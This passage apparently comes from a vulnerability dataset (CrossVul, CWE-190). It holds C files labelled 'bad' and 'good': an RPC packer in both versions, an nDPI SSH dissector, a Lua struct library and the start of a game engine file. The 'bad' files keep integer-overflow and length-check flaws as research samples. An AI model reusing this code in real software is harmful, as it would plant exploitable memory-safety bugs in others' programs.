if (max < pkg_size)
return 0;
uint32_t crc32 = le32toh(pkg->crc32);
pkg->crc32 = 0;
if (crc32 != generate_crc32c(data, pkg_size))
return -3;
pkg->crc32 = crc32;
pkg->magic = le32toh(pkg->magic);
pkg->command = le32toh(pkg->command);
pkg->pkg_type = le16toh(pkg->pkg_type);
pkg->result = le32toh(pkg->result);
pkg->sequence = le32toh(pkg->sequence);
pkg->req_id = le64toh(pkg->req_id);
pkg->body_size = le32toh(pkg->body_size);
pkg->ext_size = le16toh(pkg->ext_size);
return pkg_size;
}
int rpc_pack(rpc_pkg *pkg, void **data, uint32_t *size)
{
static void *send_buf;
static size_t send_buf_size;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + pkg->ext_size + pkg->body_size;
if (send_buf_size < pkg_size) {
if (send_buf)
free(send_buf);
send_buf_size = pkg_size * 2;
send_buf = malloc(send_buf_size);
assert(send_buf != NULL);
}
memcpy(send_buf, pkg, RPC_PKG_HEAD_SIZE);
if (pkg->ext_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE, pkg->ext, pkg->ext_size);
if (pkg->body_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE + pkg->ext_size, pkg->body, pkg->body_size);
pkg = send_buf;
pkg->magic = htole32(RPC_PKG_MAGIC);
pkg->command = htole32(pkg->command);
pkg->pkg_type = htole16(pkg->pkg_type);
pkg->result = htole32(pkg->result);
pkg->sequence = htole32(pkg->sequence);
pkg->req_id = htole64(pkg->req_id);
pkg->body_size = htole32(pkg->body_size);
pkg->ext_size = htole16(pkg->ext_size);
pkg->crc32 = 0;
pkg->crc32 = htole32(generate_crc32c(send_buf, pkg_size));
*data = send_buf;
*size = pkg_size;
return 0;
}
int rpc_send(nw_ses *ses, rpc_pkg *pkg)
{
void *data;
uint32_t size;
int ret = rpc_pack(pkg, &data, &size);
if (ret < 0)
return ret;
return nw_ses_send(ses, data, size);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_1 |
crossvul-cpp_data_bad_3973_0 | /*
* ssh.c
*
* Copyright (C) 2009-2011 by ipoque GmbH
* Copyright (C) 2011-20 - ntop.org
*
* This file is part of nDPI, an open source deep packet inspection
* library based on the OpenDPI and PACE technology by ipoque GmbH
*
* nDPI is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* nDPI is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with nDPI. If not, see <http://www.gnu.org/licenses/>.
*
*/
#include "ndpi_protocol_ids.h"
#define NDPI_CURRENT_PROTO NDPI_PROTOCOL_SSH
#include "ndpi_api.h"
#include "ndpi_md5.h"
/*
HASSH - https://github.com/salesforce/hassh
https://github.com/salesforce/hassh/blob/master/python/hassh.py
[server]
skex = packet.ssh.kex_algorithms
seastc = packet.ssh.encryption_algorithms_server_to_client
smastc = packet.ssh.mac_algorithms_server_to_client
scastc = packet.ssh.compression_algorithms_server_to_client
hasshs_str = ';'.join([skex, seastc, smastc, scastc])
[client]
ckex = packet.ssh.kex_algorithms
ceacts = packet.ssh.encryption_algorithms_client_to_server
cmacts = packet.ssh.mac_algorithms_client_to_server
ccacts = packet.ssh.compression_algorithms_client_to_server
hassh_str = ';'.join([ckex, ceacts, cmacts, ccacts])
NOTE
The ECDSA key fingerprint is SHA256 -> ssh.kex.h_sig (wireshark);
it is carried in the Message Code: Diffie-Hellman Key Exchange Reply (31),
which is usually packet 14
*/
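/*
  Illustrative sketch only (not part of the dissector): deriving a client
  hassh fingerprint from an already-joined algorithm string. The algorithm
  names below are made-up placeholders, not values from a real capture; the
  MD5 helpers are the same ones used further down in this file.
    const char *hassh_str =   kex ; enc c->s ; mac c->s ; comp c->s
      "curve25519-sha256,ecdh-sha2-nistp256;aes128-ctr;hmac-sha2-256;none";
    u_char md[16]; char hex[33]; int i;
    ndpi_MD5_CTX ctx;
    ndpi_MD5Init(&ctx);
    ndpi_MD5Update(&ctx, (const unsigned char *)hassh_str, strlen(hassh_str));
    ndpi_MD5Final(md, &ctx);
    for(i = 0; i < 16; i++) sprintf(&hex[i*2], "%02X", md[i] & 0xFF);
    hex[32] = '\0';   -> 32 hex chars, the form stored in flow->protos.ssh.hassh_client
*/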
/* #define SSH_DEBUG 1 */
static void ndpi_search_ssh_tcp(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow);
/* ************************************************************************ */
static int search_ssh_again(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow) {
ndpi_search_ssh_tcp(ndpi_struct, flow);
if((flow->protos.ssh.hassh_client[0] != '\0')
&& (flow->protos.ssh.hassh_server[0] != '\0')) {
/* stop extra processing */
flow->extra_packets_func = NULL; /* We're good now */
return(0);
}
/* Possibly more processing */
return(1);
}
/* ************************************************************************ */
static void ndpi_int_ssh_add_connection(struct ndpi_detection_module_struct
*ndpi_struct, struct ndpi_flow_struct *flow) {
if(flow->extra_packets_func != NULL)
return;
flow->guessed_host_protocol_id = flow->guessed_protocol_id = NDPI_PROTOCOL_SSH;
/* This is necessary to inform the core to call this dissector again */
flow->check_extra_packets = 1;
flow->max_extra_packets_to_check = 12;
flow->extra_packets_func = search_ssh_again;
ndpi_set_detected_protocol(ndpi_struct, flow, NDPI_PROTOCOL_SSH, NDPI_PROTOCOL_UNKNOWN);
}
/* ************************************************************************ */
static u_int16_t concat_hash_string(struct ndpi_packet_struct *packet,
char *buf, u_int8_t client_hash) {
u_int16_t offset = 22, buf_out_len = 0;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
u_int32_t len = ntohl(*(u_int32_t*)&packet->payload[offset]);
offset += 4;
/* -1 for ';' */
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
/* ssh.kex_algorithms [C/S] */
strncpy(buf, (const char *)&packet->payload[offset], buf_out_len = len);
buf[buf_out_len++] = ';';
offset += len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.server_host_key_algorithms [None] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.encryption_algorithms_client_to_server [C] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.encryption_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.mac_algorithms_client_to_server [C] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.mac_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
buf[buf_out_len++] = ';';
offset += len;
} else
offset += 4 + len;
/* ssh.compression_algorithms_client_to_server [C] */
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
offset += len;
} else
offset += 4 + len;
if(offset+sizeof(u_int32_t) >= packet->payload_packet_len)
goto invalid_payload;
/* ssh.compression_algorithms_server_to_client [S] */
len = ntohl(*(u_int32_t*)&packet->payload[offset]);
if(!client_hash) {
offset += 4;
if((offset >= packet->payload_packet_len) || (len >= packet->payload_packet_len-offset-1))
goto invalid_payload;
strncpy(&buf[buf_out_len], (const char *)&packet->payload[offset], len);
buf_out_len += len;
offset += len;
} else
offset += 4 + len;
/* ssh.languages_client_to_server [None] */
/* ssh.languages_server_to_client [None] */
#ifdef SSH_DEBUG
printf("[SSH] %s\n", buf);
#endif
return(buf_out_len);
invalid_payload:
#ifdef SSH_DEBUG
printf("[SSH] Invalid packet payload\n");
#endif
return(0);
}
/* ************************************************************************ */
static void ndpi_ssh_zap_cr(char *str, int len) {
len--;
while(len > 0) {
if((str[len] == '\n') || (str[len] == '\r')) {
str[len] = '\0';
len--;
} else
break;
}
}
/* ************************************************************************ */
static void ndpi_search_ssh_tcp(struct ndpi_detection_module_struct *ndpi_struct, struct ndpi_flow_struct *flow) {
struct ndpi_packet_struct *packet = &flow->packet;
#ifdef SSH_DEBUG
printf("[SSH] %s()\n", __FUNCTION__);
#endif
if(flow->l4.tcp.ssh_stage == 0) {
if(packet->payload_packet_len > 7 && packet->payload_packet_len < 100
&& memcmp(packet->payload, "SSH-", 4) == 0) {
int len = ndpi_min(sizeof(flow->protos.ssh.client_signature)-1, packet->payload_packet_len);
strncpy(flow->protos.ssh.client_signature, (const char *)packet->payload, len);
flow->protos.ssh.client_signature[len] = '\0';
ndpi_ssh_zap_cr(flow->protos.ssh.client_signature, len);
#ifdef SSH_DEBUG
printf("[SSH] [client_signature: %s]\n", flow->protos.ssh.client_signature);
#endif
NDPI_LOG_DBG2(ndpi_struct, "ssh stage 0 passed\n");
flow->l4.tcp.ssh_stage = 1 + packet->packet_direction;
ndpi_int_ssh_add_connection(ndpi_struct, flow);
return;
}
} else if(flow->l4.tcp.ssh_stage == (2 - packet->packet_direction)) {
if(packet->payload_packet_len > 7 && packet->payload_packet_len < 500
&& memcmp(packet->payload, "SSH-", 4) == 0) {
int len = ndpi_min(sizeof(flow->protos.ssh.server_signature)-1, packet->payload_packet_len);
strncpy(flow->protos.ssh.server_signature, (const char *)packet->payload, len);
flow->protos.ssh.server_signature[len] = '\0';
ndpi_ssh_zap_cr(flow->protos.ssh.server_signature, len);
#ifdef SSH_DEBUG
printf("[SSH] [server_signature: %s]\n", flow->protos.ssh.server_signature);
#endif
NDPI_LOG_DBG2(ndpi_struct, "ssh stage 1 passed\n");
flow->guessed_host_protocol_id = flow->guessed_protocol_id = NDPI_PROTOCOL_SSH;
#ifdef SSH_DEBUG
printf("[SSH] [completed stage: %u]\n", flow->l4.tcp.ssh_stage);
#endif
flow->l4.tcp.ssh_stage = 3;
return;
}
} else if(packet->payload_packet_len > 5) {
u_int8_t msgcode = *(packet->payload + 5);
ndpi_MD5_CTX ctx;
if(msgcode == 20 /* key exchange init */) {
char *hassh_buf = ndpi_calloc(packet->payload_packet_len, sizeof(char));
u_int i, len;
#ifdef SSH_DEBUG
printf("[SSH] [stage: %u][msg: %u][direction: %u][key exchange init]\n", flow->l4.tcp.ssh_stage, msgcode, packet->packet_direction);
#endif
if(hassh_buf) {
if(packet->packet_direction == 0 /* client */) {
u_char fingerprint_client[16];
len = concat_hash_string(packet, hassh_buf, 1 /* client */);
ndpi_MD5Init(&ctx);
ndpi_MD5Update(&ctx, (const unsigned char *)hassh_buf, len);
ndpi_MD5Final(fingerprint_client, &ctx);
#ifdef SSH_DEBUG
{
printf("[SSH] [client][%s][", hassh_buf);
for(i=0; i<16; i++) printf("%02X", fingerprint_client[i]);
printf("]\n");
}
#endif
for(i=0; i<16; i++) sprintf(&flow->protos.ssh.hassh_client[i*2], "%02X", fingerprint_client[i] & 0xFF);
flow->protos.ssh.hassh_client[32] = '\0';
} else {
u_char fingerprint_server[16];
len = concat_hash_string(packet, hassh_buf, 0 /* server */);
ndpi_MD5Init(&ctx);
ndpi_MD5Update(&ctx, (const unsigned char *)hassh_buf, len);
ndpi_MD5Final(fingerprint_server, &ctx);
#ifdef SSH_DEBUG
{
printf("[SSH] [server][%s][", hassh_buf);
for(i=0; i<16; i++) printf("%02X", fingerprint_server[i]);
printf("]\n");
}
#endif
for(i=0; i<16; i++) sprintf(&flow->protos.ssh.hassh_server[i*2], "%02X", fingerprint_server[i] & 0xFF);
flow->protos.ssh.hassh_server[32] = '\0';
}
ndpi_free(hassh_buf);
}
ndpi_int_ssh_add_connection(ndpi_struct, flow);
}
if((flow->protos.ssh.hassh_client[0] != '\0') && (flow->protos.ssh.hassh_server[0] != '\0')) {
#ifdef SSH_DEBUG
printf("[SSH] Dissection completed\n");
#endif
flow->extra_packets_func = NULL; /* We're good now */
}
return;
}
#ifdef SSH_DEBUG
printf("[SSH] Excluding SSH");
#endif
NDPI_LOG_DBG(ndpi_struct, "excluding ssh at stage %d\n", flow->l4.tcp.ssh_stage);
NDPI_ADD_PROTOCOL_TO_BITMASK(flow->excluded_protocol_bitmask, NDPI_PROTOCOL_SSH);
}
/* ************************************************************************ */
void init_ssh_dissector(struct ndpi_detection_module_struct *ndpi_struct, u_int32_t *id, NDPI_PROTOCOL_BITMASK *detection_bitmask)
{
ndpi_set_bitmask_protocol_detection("SSH", ndpi_struct, detection_bitmask, *id,
NDPI_PROTOCOL_SSH,
ndpi_search_ssh_tcp,
NDPI_SELECTION_BITMASK_PROTOCOL_V4_V6_TCP_WITH_PAYLOAD_WITHOUT_RETRANSMISSION,
SAVE_DETECTION_BITMASK_AS_UNKNOWN,
ADD_TO_DETECTION_BITMASK);
*id += 1;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3973_0 |
crossvul-cpp_data_good_400_1 | /*
* Description:
* History: yang@haipo.me, 2016/03/30, create
*/
# include <stdlib.h>
# include <assert.h>
# include "ut_rpc.h"
# include "ut_crc32.h"
# include "ut_misc.h"
int rpc_decode(nw_ses *ses, void *data, size_t max)
{
if (max < RPC_PKG_HEAD_SIZE)
return 0;
rpc_pkg *pkg = data;
if (le32toh(pkg->magic) != RPC_PKG_MAGIC)
return -1;
uint32_t pkg_size = RPC_PKG_HEAD_SIZE + le16toh(pkg->ext_size) + le32toh(pkg->body_size);
if (max < pkg_size)
return 0;
uint32_t crc32 = le32toh(pkg->crc32);
pkg->crc32 = 0;
if (crc32 != generate_crc32c(data, pkg_size))
return -3;
pkg->crc32 = crc32;
pkg->magic = le32toh(pkg->magic);
pkg->command = le32toh(pkg->command);
pkg->pkg_type = le16toh(pkg->pkg_type);
pkg->result = le32toh(pkg->result);
pkg->sequence = le32toh(pkg->sequence);
pkg->req_id = le64toh(pkg->req_id);
pkg->body_size = le32toh(pkg->body_size);
pkg->ext_size = le16toh(pkg->ext_size);
return pkg_size;
}
int rpc_pack(rpc_pkg *pkg, void **data, uint32_t *size)
{
static void *send_buf;
static size_t send_buf_size;
uint32_t pkg_size;
if (pkg->body_size > RPC_PKG_MAX_BODY_SIZE) {
return -1;
}
pkg_size = RPC_PKG_HEAD_SIZE + pkg->ext_size + pkg->body_size;
if (send_buf_size < pkg_size) {
if (send_buf)
free(send_buf);
send_buf_size = pkg_size * 2;
send_buf = malloc(send_buf_size);
if (send_buf == NULL) {
return -1;
}
}
memcpy(send_buf, pkg, RPC_PKG_HEAD_SIZE);
if (pkg->ext_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE, pkg->ext, pkg->ext_size);
if (pkg->body_size)
memcpy(send_buf + RPC_PKG_HEAD_SIZE + pkg->ext_size, pkg->body, pkg->body_size);
pkg = send_buf;
pkg->magic = htole32(RPC_PKG_MAGIC);
pkg->command = htole32(pkg->command);
pkg->pkg_type = htole16(pkg->pkg_type);
pkg->result = htole32(pkg->result);
pkg->sequence = htole32(pkg->sequence);
pkg->req_id = htole64(pkg->req_id);
pkg->body_size = htole32(pkg->body_size);
pkg->ext_size = htole16(pkg->ext_size);
pkg->crc32 = 0;
pkg->crc32 = htole32(generate_crc32c(send_buf, pkg_size));
*data = send_buf;
*size = pkg_size;
return 0;
}
int rpc_send(nw_ses *ses, rpc_pkg *pkg)
{
void *data;
uint32_t size;
int ret = rpc_pack(pkg, &data, &size);
if (ret < 0)
return ret;
return nw_ses_send(ses, data, size);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_400_1 |
crossvul-cpp_data_bad_131_0 | /*
** {======================================================
** Library for packing/unpacking structures.
** $Id: struct.c,v 1.7 2018/05/11 22:04:31 roberto Exp $
** See Copyright Notice at the end of this file
** =======================================================
*/
/*
** Valid formats:
** > - big endian
** < - little endian
** ![num] - alignment
** x - padding
** b/B - signed/unsigned byte
** h/H - signed/unsigned short
** l/L - signed/unsigned long
** T - size_t
** i/In - signed/unsigned integer with size 'n' (default is size of int)
** cn - sequence of 'n' chars (from/to a string); when packing, n==0 means
the whole string; when unpacking, n==0 means use the previous
read number as the string length
** s - zero-terminated string
** f - float
** d - double
** ' ' - ignored
*/
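/*
** Usage sketch (illustrative only; the values are made up). The same format
** string drives pack, unpack and size:
**   local s = struct.pack(">!4biH", 0x12, -3, 500)
**   local b, i, h, nextpos = struct.unpack(">!4biH", s)
**   local n = struct.size(">!4biH")
** '>' selects big endian, '!4' caps alignment at 4 bytes, 'b' is a signed
** byte, 'i' a native-size int and 'H' an unsigned short.
*/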
#include <assert.h>
#include <ctype.h>
#include <limits.h>
#include <stddef.h>
#include <string.h>
#include "lua.h"
#include "lauxlib.h"
#if (LUA_VERSION_NUM >= 502)
#define luaL_register(L,n,f) luaL_newlib(L,f)
#endif
/* basic integer type */
#if !defined(STRUCT_INT)
#define STRUCT_INT long
#endif
typedef STRUCT_INT Inttype;
/* corresponding unsigned version */
typedef unsigned STRUCT_INT Uinttype;
/* maximum size (in bytes) for integral types */
#define MAXINTSIZE 32
/* is 'x' a power of 2? */
#define isp2(x) ((x) > 0 && ((x) & ((x) - 1)) == 0)
/* dummy structure to get alignment requirements */
struct cD {
char c;
double d;
};
#define PADDING (sizeof(struct cD) - sizeof(double))
#define MAXALIGN (PADDING > sizeof(int) ? PADDING : sizeof(int))
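/* For illustration (platform-dependent, not guaranteed by the C standard):
on a typical LP64 system sizeof(struct cD) == 16, so PADDING == 8 and
MAXALIGN == 8; the leading 'c' member makes the compiler expose how much
padding a double requires. */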
/* endian options */
#define BIG 0
#define LITTLE 1
static union {
int dummy;
char endian;
} const native = {1};
typedef struct Header {
int endian;
int align;
} Header;
static int getnum (const char **fmt, int df) {
if (!isdigit(**fmt)) /* no number? */
return df; /* return default value */
else {
int a = 0;
do {
a = a*10 + *((*fmt)++) - '0';
} while (isdigit(**fmt));
return a;
}
}
#define defaultoptions(h) ((h)->endian = native.endian, (h)->align = 1)
static size_t optsize (lua_State *L, char opt, const char **fmt) {
switch (opt) {
case 'B': case 'b': return sizeof(char);
case 'H': case 'h': return sizeof(short);
case 'L': case 'l': return sizeof(long);
case 'T': return sizeof(size_t);
case 'f': return sizeof(float);
case 'd': return sizeof(double);
case 'x': return 1;
case 'c': return getnum(fmt, 1);
case 'i': case 'I': {
int sz = getnum(fmt, sizeof(int));
if (sz > MAXINTSIZE)
luaL_error(L, "integral size %d is larger than limit of %d",
sz, MAXINTSIZE);
return sz;
}
default: return 0; /* other cases do not need alignment */
}
}
/*
** return number of bytes needed to align an element of size 'size'
** at current position 'len'
*/
static int gettoalign (size_t len, Header *h, int opt, size_t size) {
if (size == 0 || opt == 'c') return 0;
if (size > (size_t)h->align)
size = h->align; /* respect max. alignment */
return (size - (len & (size - 1))) & (size - 1);
}
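/* Worked example for gettoalign(): with len == 5, size == 4 and the maximum
alignment set to at least 4 (e.g. via a '!4' option), the padding is
(4 - (5 & 3)) & 3 == 3, i.e. three filler bytes move the next element to
offset 8, a multiple of 4. */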
/*
** options to control endianness and alignment
*/
static void controloptions (lua_State *L, int opt, const char **fmt,
Header *h) {
switch (opt) {
case ' ': return; /* ignore white spaces */
case '>': h->endian = BIG; return;
case '<': h->endian = LITTLE; return;
case '!': {
int a = getnum(fmt, MAXALIGN);
if (!isp2(a))
luaL_error(L, "alignment %d is not a power of 2", a);
h->align = a;
return;
}
default: {
const char *msg = lua_pushfstring(L, "invalid format option '%c'", opt);
luaL_argerror(L, 1, msg);
}
}
}
static void putinteger (lua_State *L, luaL_Buffer *b, int arg, int endian,
int size) {
lua_Number n = luaL_checknumber(L, arg);
Uinttype value;
char buff[MAXINTSIZE];
if (n < 0)
value = (Uinttype)(Inttype)n;
else
value = (Uinttype)n;
if (endian == LITTLE) {
int i;
for (i = 0; i < size; i++) {
buff[i] = (value & 0xff);
value >>= 8;
}
}
else {
int i;
for (i = size - 1; i >= 0; i--) {
buff[i] = (value & 0xff);
value >>= 8;
}
}
luaL_addlstring(b, buff, size);
}
static void correctbytes (char *b, int size, int endian) {
if (endian != native.endian) {
int i = 0;
while (i < --size) {
char temp = b[i];
b[i++] = b[size];
b[size] = temp;
}
}
}
static int b_pack (lua_State *L) {
luaL_Buffer b;
const char *fmt = luaL_checkstring(L, 1);
Header h;
int arg = 2;
size_t totalsize = 0;
defaultoptions(&h);
lua_pushnil(L); /* mark to separate arguments from string buffer */
luaL_buffinit(L, &b);
while (*fmt != '\0') {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
int toalign = gettoalign(totalsize, &h, opt, size);
totalsize += toalign;
while (toalign-- > 0) luaL_addchar(&b, '\0');
switch (opt) {
case 'b': case 'B': case 'h': case 'H':
case 'l': case 'L': case 'T': case 'i': case 'I': { /* integer types */
putinteger(L, &b, arg++, h.endian, size);
break;
}
case 'x': {
luaL_addchar(&b, '\0');
break;
}
case 'f': {
float f = (float)luaL_checknumber(L, arg++);
correctbytes((char *)&f, size, h.endian);
luaL_addlstring(&b, (char *)&f, size);
break;
}
case 'd': {
double d = luaL_checknumber(L, arg++);
correctbytes((char *)&d, size, h.endian);
luaL_addlstring(&b, (char *)&d, size);
break;
}
case 'c': case 's': {
size_t l;
const char *s = luaL_checklstring(L, arg++, &l);
if (size == 0) size = l;
luaL_argcheck(L, l >= (size_t)size, arg, "string too short");
luaL_addlstring(&b, s, size);
if (opt == 's') {
luaL_addchar(&b, '\0'); /* add zero at the end */
size++;
}
break;
}
default: controloptions(L, opt, &fmt, &h);
}
totalsize += size;
}
luaL_pushresult(&b);
return 1;
}
static lua_Number getinteger (const char *buff, int endian,
int issigned, int size) {
Uinttype l = 0;
int i;
if (endian == BIG) {
for (i = 0; i < size; i++) {
l <<= 8;
l |= (Uinttype)(unsigned char)buff[i];
}
}
else {
for (i = size - 1; i >= 0; i--) {
l <<= 8;
l |= (Uinttype)(unsigned char)buff[i];
}
}
if (!issigned)
return (lua_Number)l;
else { /* signed format */
Uinttype mask = (Uinttype)(~((Uinttype)0)) << (size*8 - 1);
if (l & mask) /* negative value? */
l |= mask; /* sign extension */
return (lua_Number)(Inttype)l;
}
}
static int b_unpack (lua_State *L) {
Header h;
const char *fmt = luaL_checkstring(L, 1);
size_t ld;
const char *data = luaL_checklstring(L, 2, &ld);
size_t pos = luaL_optinteger(L, 3, 1) - 1;
int n = 0; /* number of results */
defaultoptions(&h);
while (*fmt) {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
pos += gettoalign(pos, &h, opt, size);
luaL_argcheck(L, pos+size <= ld, 2, "data string too short");
/* stack space for item + next position */
luaL_checkstack(L, 2, "too many results");
switch (opt) {
case 'b': case 'B': case 'h': case 'H':
case 'l': case 'L': case 'T': case 'i': case 'I': { /* integer types */
int issigned = islower(opt);
lua_Number res = getinteger(data+pos, h.endian, issigned, size);
lua_pushnumber(L, res); n++;
break;
}
case 'x': {
break;
}
case 'f': {
float f;
memcpy(&f, data+pos, size);
correctbytes((char *)&f, sizeof(f), h.endian);
lua_pushnumber(L, f); n++;
break;
}
case 'd': {
double d;
memcpy(&d, data+pos, size);
correctbytes((char *)&d, sizeof(d), h.endian);
lua_pushnumber(L, d); n++;
break;
}
case 'c': {
if (size == 0) {
if (n == 0 || !lua_isnumber(L, -1))
luaL_error(L, "format 'c0' needs a previous size");
size = lua_tonumber(L, -1);
lua_pop(L, 1); n--;
luaL_argcheck(L, size <= ld && pos <= ld - size,
2, "data string too short");
}
lua_pushlstring(L, data+pos, size); n++;
break;
}
case 's': {
const char *e = (const char *)memchr(data+pos, '\0', ld - pos);
if (e == NULL)
luaL_error(L, "unfinished string in data");
size = (e - (data+pos)) + 1;
lua_pushlstring(L, data+pos, size - 1); n++;
break;
}
default: controloptions(L, opt, &fmt, &h);
}
pos += size;
}
lua_pushinteger(L, pos + 1); /* next position */
return n + 1;
}
static int b_size (lua_State *L) {
Header h;
const char *fmt = luaL_checkstring(L, 1);
size_t pos = 0;
defaultoptions(&h);
while (*fmt) {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
pos += gettoalign(pos, &h, opt, size);
if (opt == 's')
luaL_argerror(L, 1, "option 's' has no fixed size");
else if (opt == 'c' && size == 0)
luaL_argerror(L, 1, "option 'c0' has no fixed size");
if (!isalnum(opt))
controloptions(L, opt, &fmt, &h);
pos += size;
}
lua_pushinteger(L, pos);
return 1;
}
/* }====================================================== */
static const struct luaL_Reg thislib[] = {
{"pack", b_pack},
{"unpack", b_unpack},
{"size", b_size},
{NULL, NULL}
};
LUALIB_API int luaopen_struct (lua_State *L);
LUALIB_API int luaopen_struct (lua_State *L) {
luaL_register(L, "struct", thislib);
return 1;
}
/******************************************************************************
* Copyright (C) 2010-2018 Lua.org, PUC-Rio. All rights reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sublicense, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
* IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
* CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
******************************************************************************/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_131_0 |
crossvul-cpp_data_bad_35_0 | /**
* miniSphere JavaScript game engine
* Copyright (c) 2015-2018, Fat Cerberus
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of miniSphere nor the names of its contributors may be
* used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
**/
#include "minisphere.h"
#include "map_engine.h"
#include "api.h"
#include "audio.h"
#include "color.h"
#include "dispatch.h"
#include "geometry.h"
#include "image.h"
#include "input.h"
#include "jsal.h"
#include "obstruction.h"
#include "script.h"
#include "spriteset.h"
#include "tileset.h"
#include "vanilla.h"
#include "vector.h"
static const person_t* s_acting_person;
static mixer_t* s_bgm_mixer = NULL;
static person_t* s_camera_person = NULL;
static int s_camera_x = 0;
static int s_camera_y = 0;
static color_t s_color_mask;
static const person_t* s_current_person = NULL;
static int s_current_trigger = -1;
static int s_current_zone = -1;
static script_t* s_def_map_scripts[MAP_SCRIPT_MAX];
static script_t* s_def_person_scripts[PERSON_SCRIPT_MAX];
static bool s_exiting = false;
static color_t s_fade_color_from;
